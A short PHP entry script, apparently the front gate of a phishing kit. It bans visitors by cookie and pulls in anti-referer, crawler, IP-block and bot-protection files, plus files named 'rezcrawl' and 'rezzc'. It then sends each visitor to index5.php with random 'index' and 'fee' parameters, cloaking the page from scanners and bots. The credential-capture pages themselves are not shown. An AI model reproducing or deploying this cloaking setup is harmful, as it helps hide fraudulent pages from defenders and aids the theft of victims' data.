<?php
session_start();
include_once '../config/index.php';

// Controleer of de ban-cookie is gezet
if (isset($_COOKIE['baneo'])) {
    header("Location: " . $config['urls']['botRedirect']);
    exit;
}

include_once 'anti_referer.php';
include_once 'crawlers.php';
include_once 'loader.php';
include_once 'loader_ips.php';
include_once 'loader_ips_2.php';
include_once 'block.php';
include_once 'rezcrawl.php';
include_once 'rezzc.php';
include_once 'bot_protection.php';

$reader = "";
$index = rand(10000, 99999) . $reader;
$fee = sha1(rand(10000, 99999));
header("Location: index5.php?index=" . $index . "&fee=" . $fee);
exit;
?>
